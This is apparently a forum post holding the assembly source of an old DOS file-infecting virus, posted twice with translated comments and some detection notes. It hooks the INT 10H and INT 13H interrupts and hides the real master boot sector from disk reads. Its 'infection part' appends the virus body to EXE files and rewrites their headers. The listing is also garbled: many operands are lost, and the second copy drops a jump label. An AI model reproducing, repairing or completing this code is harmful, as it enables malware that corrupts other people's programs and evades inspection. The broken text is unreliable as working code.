『第 16 楼』:
; SM: hook-installation routine (the original notes were in Chinese; translated here).
; Author's description: save the INT 10H and INT 13H vectors into the INT 85H
; and INT 86H slots, then repoint 10H and 13H at the new handlers.
; NOTE(review): every bracketed memory operand (the text after "DS:") was lost
; when this post was extracted, so the vector-table offsets are not visible and
; the listing does not assemble as shown.
; Detection angle: vectors 85H/86H holding what look like the BIOS video/disk
; entry points while 10H/13H point elsewhere matches what this routine describes.
SM PROC
MOV AX,DS: ; word copy 1 of 4 (source operand lost)
MOV DS:,AX ; (destination operand lost)
MOV AX,DS: ; word copy 2 of 4
MOV DS:,AX
;
MOV AX,DS: ; word copy 3 of 4
MOV DS:,AX
MOV AX,DS: ; word copy 4 of 4
MOV DS:,AX
;
MOV AX,OFFSET NEW10H-OFFSET HDP ; NEW10H offset relative to the HDP label (HDP is defined outside this excerpt)
MOV DS:,AX ; destination lost; presumably the offset word of the INT 10H vector - confirm
MOV AX,22H ; constant 22H; presumably the segment word of the new vector - confirm
MOV DS:,AX
;
MOV AX,OFFSET NEW13H-OFFSET HDP ; same pattern for the NEW13H handler
MOV DS:,AX
MOV AX,22H
MOV DS:,AX
RET
SM ENDP
; NEW10H: replacement INT 10H handler (notes translated from Chinese).
; AH = 00H takes the N1 path, which reads two sectors from the first hard disk
; into 8000:0000 and jumps into the loaded code; every other function is
; forwarded through INT 85H, which the author's notes describe as the saved
; original INT 10H.
; Analysis note: the sectors this read targets (cylinder 0, head 0, sectors 2-3
; of drive 80H) are where an examiner would look for the stored body.
NEW10H:CMP AH,00 ; is this INT 10H function 00H?
JZ N1 ; yes -> N1: load the main code and run it
INT 85H ; no -> forward to the original INT 10H
IRET
N1: PUSH AX ; save AX, BX, CX, DX, DS, ES; the HW label pops them in reverse order
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
;
MOV AX,8000H
MOV ES,AX ; ES = 8000H, so the read buffer is ES:BX = 8000:0000
;
MOV AX,0202H ; AH=02H read sectors, AL=02H sector count
XOR BX,BX ; buffer offset 0
MOV CX,0002H ; CH=00H cylinder 0, CL=02H sector 2
MOV DX,0080H ; DH=00H head 0, DL=80H first hard disk
INT 13H ; BIOS disk read
;
MOV BX,OFFSET JMP_MAIN-OFFSET HDP ; BX = JMP_MAIN offset relative to HDP (both defined outside this excerpt)
JMP DWORD PTR CS: ; far jump through a pointer in CS; the operand after "CS:" was lost in extraction
NEW13H:PUSHF ;|----------------------;新中断13H的作用:
; Body of the replacement INT 13H handler (notes translated from Chinese).
; A request with AH=02H, CX=0001H, DX=0080H (read cylinder 0, head 0, sector 1
; of the first hard disk, i.e. the master boot sector) has CX rewritten to 0017H
; before it is forwarded through INT 86H; everything else is forwarded unchanged.
; NOTE(review): the author's note says "sector 4", but CL=17H is sector 23 - the
; note and the constant disagree.
; Defender note: because of this redirection, a boot-sector read made through
; INT 13H on a running affected system does not return the real sector 1;
; examine the disk after booting from known-clean media.
CMP CX,0001H ; cylinder 0, sector 1?
JNZ NGW ; no -> forward unchanged
CMP AH,02H ; read-sectors function?
JNZ NGW
CMP DX,0080H ; head 0 of drive 80H?
JNZ NGW
;
MOV CX,0017H ; redirect the read to cylinder 0, sector 17H
NGW: POPF ; restore the flags saved at handler entry
INT 86H ; forward to the original INT 13H (per the author's notes on SM)
IRET
;** PART 4: infection part ******************************************************
; MAIN (notes translated from Chinese). Sets the DTA, then walks the current
; directory with DOS find-first/find-next. A match is skipped when it carries
; the marker value 77 or when its size word is 09H or more; the first remaining
; match is passed to GR, after which execution falls into HW.
; HW pops the six registers pushed at N1 in NEW10H and hands the request to the
; original INT 10H through INT 85H.
MAIN: MOV AX,CS
MOV ES,AX
MOV DS,AX ; DS = ES = CS: data is addressed inside the code segment
MOV AH,1AH ; DOS 1AH: set disk transfer address
MOV DX,OFFSET DTA ; DS:DX -> DTA buffer declared at the end of the listing
INT 21H
MOV AH,4EH ; DOS 4EH: find first
JMP DIR
SDIR: MOV AH,4FH ; DOS 4FH: find next
DIR : MOV DX,OFFSET FNEXE ; search pattern; FNEXE is defined outside this excerpt (author: EXE files)
MOV CX,100111B ; attribute mask 27H: read-only, hidden, system and archive files are included
INT 21H
JC HW ; carry set = nothing (more) found -> HW
CMP DS:,BYTE PTR 77 ; marker test; operand lost - presumably the DTA time low byte (T_L), since GR stamps CL=77 into the file time - confirm
JZ SDIR ; already marked -> next file
MOV CX,DS: ; operand lost; per the author's note this is the file length (presumably the high word, S_H)
CMP CX,09H
JNB SDIR ; 09H or more (author: length over 90000H) -> next file
; author's note: a file that is already marked or too long is not infected
CALL GR ; process the file named in the DTA
;
HW: POP ES ; restore the registers pushed at N1
POP DS
POP DX
POP CX
POP BX
POP AX
INT 85H ; run the original INT 10H
IRET
; GR: author's description - "infect EXE file" (notes translated from Chinese).
; Sequence visible below: clear attributes -> open read/write -> read header
; fields at offsets 08H and 14H -> seek to end -> pad to a paragraph boundary ->
; append P_SIZE bytes from offset 0 -> rewrite header fields at 02H and 14H ->
; set the file time with low byte 77 -> close -> restore attributes.
; NOTE(review): several memory operands (text after "DS:") were lost in
; extraction, so the size arithmetic cannot be fully followed from this text.
; Detection angle: a file this routine has processed has its header entry point
; (offset 14H) rewritten, extra bytes after the original image, and a last-write
; time whose low byte is 77 (4DH).
GR PROC
;
MOV DX,OFFSET FN ; DS:DX -> file name left in the DTA
MOV AX,4301H ; DOS 4301H: set file attributes
MOV CX,100000B ; attributes = 20H (archive only)
INT 21H
MOV AX,3D02H ; DOS 3DH: open, AL=02H read/write
INT 21H
MOV BX,AX ; BX = file handle for the calls below
MOV AX,4200H ; DOS 42H, AL=00H: seek from start of file
XOR CX,CX
MOV DX,8H ; CX:DX = 08H (author: header length field)
INT 21H
MOV AH,3FH ; DOS 3FH: read
MOV CX,2H ; 2 bytes
MOV DX,OFFSET H_EXE ; into H_EXE (defined outside this excerpt)
INT 21H
MOV AX,4200H
XOR CX,CX
MOV DX,14H ; offset 14H (author: initial CS:IP)
INT 21H
MOV AH,3FH
MOV CX,4H ; 4 bytes
MOV DX,OFFSET B_IP ; saved copy of the original entry point (B_IP defined outside this excerpt)
INT 21H
MOV AX,4202H ; DOS 42H, AL=02H: seek to end of file (offset 0 from end)
XOR CX,CX
XOR DX,DX
INT 21H
MOV DX,DS: ; operands lost; presumably the file length high/low words - confirm
MOV AX,DS:
MOV CX,10H
DIV CX ; DX:AX / 10H -> AX = quotient, DX = remainder
INC AX ; author: round the length up to a multiple of 10H so the body runs at CS:00
SUB AX,DS: ; operand lost; presumably the header size read into H_EXE - confirm
MOV DS:,AX ; destination lost
SUB CX,DX ; CX = 10H - remainder = number of padding bytes
PUSH CX ; kept for the length calculation below
MOV AH,40H ; DOS 40H: write CX bytes (the padding)
INT 21H
MOV AH,40H
MOV CX,OFFSET P_SIZE ; byte count = P_SIZE, the label at the end of the listing
XOR DX,DX ; source = offset 0 of the data segment
INT 21H ; author: append itself to the end of the file
MOV AX,4200H
XOR CX,CX
MOV DX,02H ; offset 02H (author: last-page byte count and page count)
INT 21H
MOV DX,DS: ; operands lost; presumably the original length again - confirm
MOV AX,DS:
POP CX ; padding count pushed above
ADC AX,CX ; add the padding to the low word
JNC NC1
INC DX ; carry into the high word
NC1: ADC AX,OFFSET P_SIZE ; add the appended length
JNC NC2
INC DX
NC2: MOV CX,200H
DIV CX ; split the new length into 200H-byte pages (AX) and remainder (DX)
INC AX
MOV DS:,DX ; destinations lost; presumably the two words at B_EXE written next - confirm
MOV DS:,AX
MOV DX,OFFSET B_EXE
MOV CX,4H
MOV AH,40H ; write 4 bytes at header offset 02H
INT 21H
MOV AX,4200H
XOR CX,CX
MOV DX,14H
INT 21H
MOV AH,40H
MOV CX,4H
MOV DX,OFFSET N_IP ; new entry-point value (N_IP defined outside this excerpt)
INT 21H ; write 4 bytes at header offset 14H
MOV AX,5701H ; DOS 5701H: set file date/time
MOV CH,DS: ; operand lost; presumably the saved time high byte (T_H)
MOV CL,77 ; time low byte forced to 77: the marker MAIN tests for
MOV DX,DS: ; operand lost; presumably the saved date (D)
INT 21H
MOV AH,3EH ; DOS 3EH: close file
INT 21H
MOV DX,OFFSET FN
MOV AX,4301H ; DOS 4301H: set file attributes
XOR CH,CH
MOV CL,DS: ; operand lost; presumably the original attribute byte (C)
INT 21H
RET
GR ENDP
; DTA (disk transfer address) buffer; fields as labelled by the author
; (notes translated from Chinese).
DTA DB 21 DUP(0) ; bytes DOS function 4FH (find next) uses
C DB 0 ; file attribute
T_L DB 0 ; file time, low byte
T_H DB 0 ; file time, high byte
D DW 0 ; file date
S_L DW 0 ; file length, low word
S_H DW 0 ; file length, high word
FN DB 13 DUP(0) ; full file name
P_SIZE: ; end-of-body label; GR uses OFFSET P_SIZE as the byte count it appends
CSEG ENDS
END START
```asm
; SM: hook-installation routine.
; Author's description: save the INT 10H and INT 13H vectors into the INT 85H
; and INT 86H slots, then repoint 10H and 13H at the new handlers.
; NOTE(review): every bracketed memory operand (the text after "DS:") was lost
; when this post was extracted, so the vector-table offsets are not visible and
; the listing does not assemble as shown.
; Detection angle: vectors 85H/86H holding what look like the BIOS video/disk
; entry points while 10H/13H point elsewhere matches what this routine describes.
SM PROC
MOV AX,DS: ; word copy 1 of 4 (source operand lost)
MOV DS:,AX ; (destination operand lost)
MOV AX,DS: ; word copy 2 of 4
MOV DS:,AX
;
MOV AX,DS: ; word copy 3 of 4
MOV DS:,AX
MOV AX,DS: ; word copy 4 of 4
MOV DS:,AX
;
MOV AX,OFFSET NEW10H-OFFSET HDP ; NEW10H offset relative to the HDP label (HDP is defined outside this excerpt)
MOV DS:,AX ; destination lost; presumably the offset word of the INT 10H vector - confirm
MOV AX,22H ; constant 22H; presumably the segment word of the new vector - confirm
MOV DS:,AX
;
MOV AX,OFFSET NEW13H-OFFSET HDP ; same pattern for the NEW13H handler
MOV DS:,AX
MOV AX,22H
MOV DS:,AX
RET
SM ENDP
; NEW10H: replacement INT 10H handler.
; AH = 00H takes the N1 path, which reads two sectors from the first hard disk
; into 8000:0000 and jumps into the loaded code; every other function is
; forwarded through INT 85H, which the author's notes describe as the saved
; original INT 10H.
; Analysis note: the sectors this read targets (cylinder 0, head 0, sectors 2-3
; of drive 80H) are where an examiner would look for the stored body.
NEW10H:CMP AH,00 ; is this INT 10H function 00H?
JZ N1 ; yes -> N1: load the main code and run it
INT 85H ; no -> forward to the original INT 10H
IRET
N1: PUSH AX ; save AX, BX, CX, DX, DS, ES; the HW label pops them in reverse order
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
;
MOV AX,8000H
MOV ES,AX ; ES = 8000H, so the read buffer is ES:BX = 8000:0000
;
MOV AX,0202H ; AH=02H read sectors, AL=02H sector count
XOR BX,BX ; buffer offset 0
MOV CX,0002H ; CH=00H cylinder 0, CL=02H sector 2
MOV DX,0080H ; DH=00H head 0, DL=80H first hard disk
INT 13H ; BIOS disk read
;
MOV BX,OFFSET JMP_MAIN-OFFSET HDP ; BX = JMP_MAIN offset relative to HDP (both defined outside this excerpt)
JMP DWORD PTR CS: ; far jump through a pointer in CS; the operand after "CS:" was lost in extraction
; NEW13H: replacement INT 13H handler.
; A request with AH=02H, CX=0001H, DX=0080H (read cylinder 0, head 0, sector 1
; of the first hard disk, i.e. the master boot sector) has CX rewritten to 0017H
; before it is forwarded through INT 86H; everything else is forwarded unchanged.
; NOTE(review): the author's note says "sector 4", but CL=17H is sector 23 - the
; note and the constant disagree.
; Defender note: because of this redirection, a boot-sector read made through
; INT 13H on a running affected system does not return the real sector 1;
; examine the disk after booting from known-clean media.
NEW13H:PUSHF ; keep the caller's flags across the compares below
CMP CX,0001H ; cylinder 0, sector 1?
JNZ NGW ; no -> forward unchanged
CMP AH,02H ; read-sectors function?
JNZ NGW
CMP DX,0080H ; head 0 of drive 80H?
JNZ NGW
;
MOV CX,0017H ; redirect the read to cylinder 0, sector 17H
NGW: POPF ; restore the flags saved at entry
INT 86H ; forward to the original INT 13H (per the author's notes on SM)
IRET
;** PART 4: infection part ******************************************************
; MAIN: sets the DTA, then walks the current directory with DOS
; find-first/find-next. A match is skipped when it carries the marker value 77
; or when its size word is 09H or more; the first remaining match is passed to
; GR, after which execution falls into HW.
; HW pops the six registers pushed at N1 in NEW10H and hands the request to the
; original INT 10H through INT 85H.
; NOTE(review): the Chinese listing earlier in this post has the label "DIR :"
; on the MOV DX,OFFSET FNEXE line; this translated copy dropped it, so the
; JMP DIR below has no target as printed.
MAIN: MOV AX,CS
MOV ES,AX
MOV DS,AX ; DS = ES = CS: data is addressed inside the code segment
MOV AH,1AH ; DOS 1AH: set disk transfer address
MOV DX,OFFSET DTA ; DS:DX -> DTA buffer declared at the end of the listing
INT 21H
MOV AH,4EH ; DOS 4EH: find first
JMP DIR
SDIR: MOV AH,4FH ; DOS 4FH: find next
MOV DX,OFFSET FNEXE ; search pattern; FNEXE is defined outside this excerpt (author: EXE files)
MOV CX,100111B ; attribute mask 27H: read-only, hidden, system and archive files are included
INT 21H
JC HW ; carry set = nothing (more) found -> HW
CMP DS:,BYTE PTR 77 ; marker test; operand lost - presumably the DTA time low byte (T_L), since GR stamps CL=77 into the file time - confirm
JZ SDIR ; already marked -> next file
MOV CX,DS: ; operand lost; per the author's note this is the file length (presumably the high word, S_H)
CMP CX,09H
JNB SDIR ; 09H or more (author: length over 90000H) -> next file
; author's note: a file that is already marked or too long is not infected
CALL GR ; process the file named in the DTA
HW: POP ES ; restore the registers pushed at N1
POP DS
POP DX
POP CX
POP BX
POP AX
INT 85H ; run the original INT 10H
IRET
; GR: author's description - "infect EXE files".
; Sequence visible below: clear attributes -> open read/write -> read header
; fields at offsets 08H and 14H -> seek to end -> pad to a paragraph boundary ->
; append P_SIZE bytes from offset 0 -> rewrite header fields at 02H and 14H ->
; set the file time with low byte 77 -> close -> restore attributes.
; NOTE(review): several memory operands (text after "DS:") were lost in
; extraction, so the size arithmetic cannot be fully followed from this text.
; Detection angle: a file this routine has processed has its header entry point
; (offset 14H) rewritten, extra bytes after the original image, and a last-write
; time whose low byte is 77 (4DH).
GR PROC
;
MOV DX,OFFSET FN ; DS:DX -> file name left in the DTA
MOV AX,4301H ; DOS 4301H: set file attributes
MOV CX,100000B ; attributes = 20H (archive only)
INT 21H
MOV AX,3D02H ; DOS 3DH: open, AL=02H read/write
INT 21H
MOV BX,AX ; BX = file handle for the calls below
MOV AX,4200H ; DOS 42H, AL=00H: seek from start of file
XOR CX,CX
MOV DX,8H ; CX:DX = 08H (author: header length field)
INT 21H
MOV AH,3FH ; DOS 3FH: read
MOV CX,2H ; 2 bytes
MOV DX,OFFSET H_EXE ; into H_EXE (defined outside this excerpt)
INT 21H
MOV AX,4200H
XOR CX,CX
MOV DX,14H ; offset 14H (author: initial CS:IP)
INT 21H
MOV AH,3FH
MOV CX,4H ; 4 bytes
MOV DX,OFFSET B_IP ; saved copy of the original entry point (B_IP defined outside this excerpt)
INT 21H
MOV AX,4202H ; DOS 42H, AL=02H: seek to end of file (offset 0 from end)
XOR CX,CX
XOR DX,DX
INT 21H
MOV DX,DS: ; operands lost; presumably the file length high/low words - confirm
MOV AX,DS:
MOV CX,10H
DIV CX ; DX:AX / 10H -> AX = quotient, DX = remainder
INC AX ; author: round the length up to a multiple of 10H so the body runs at CS:00
SUB AX,DS: ; operand lost; presumably the header size read into H_EXE - confirm
MOV DS:,AX ; destination lost
SUB CX,DX ; CX = 10H - remainder = number of padding bytes
PUSH CX ; kept for the length calculation below
MOV AH,40H ; DOS 40H: write CX bytes (the padding)
INT 21H
MOV AH,40H
MOV CX,OFFSET P_SIZE ; byte count = P_SIZE, the label at the end of the listing
XOR DX,DX ; source = offset 0 of the data segment
INT 21H ; author: append itself to the end of the file
MOV AX,4200H
XOR CX,CX
MOV DX,02H ; offset 02H (author: last-page byte count and page count)
INT 21H
MOV DX,DS: ; operands lost; presumably the original length again - confirm
MOV AX,DS:
POP CX ; padding count pushed above
ADC AX,CX ; add the padding to the low word
JNC NC1
INC DX ; carry into the high word
NC1: ADC AX,OFFSET P_SIZE ; add the appended length
JNC NC2
INC DX
NC2: MOV CX,200H
DIV CX ; split the new length into 200H-byte pages (AX) and remainder (DX)
INC AX
MOV DS:,DX ; destinations lost; presumably the two words at B_EXE written next - confirm
MOV DS:,AX
MOV DX,OFFSET B_EXE
MOV CX,4H
MOV AH,40H ; write 4 bytes at header offset 02H
INT 21H
MOV AX,4200H
XOR CX,CX
MOV DX,14H
INT 21H
MOV AH,40H
MOV CX,4H
MOV DX,OFFSET N_IP ; new entry-point value (N_IP defined outside this excerpt)
INT 21H ; write 4 bytes at header offset 14H
MOV AX,5701H ; DOS 5701H: set file date/time
MOV CH,DS: ; operand lost; presumably the saved time high byte (T_H)
MOV CL,77 ; time low byte forced to 77: the marker MAIN tests for
MOV DX,DS: ; operand lost; presumably the saved date (D)
INT 21H
MOV AH,3EH ; DOS 3EH: close file
INT 21H
MOV DX,OFFSET FN
MOV AX,4301H ; DOS 4301H: set file attributes
XOR CH,CH
MOV CL,DS: ; operand lost; presumably the original attribute byte (C)
INT 21H
RET
GR ENDP
; DTA (disk transfer address) buffer; fields as labelled by the author.
DTA DB 21 DUP(0) ; bytes DOS function 4FH (find next) uses
C DB 0 ; file attribute
T_L DB 0 ; file time, low byte
T_H DB 0 ; file time, high byte
D DW 0 ; file date
S_L DW 0 ; file length, low word (declared DW, not a byte)
S_H DW 0 ; file length, high word
FN DB 13 DUP(0) ; full file name
P_SIZE: ; end-of-body label; GR uses OFFSET P_SIZE as the byte count it appends
CSEG ENDS
END START
```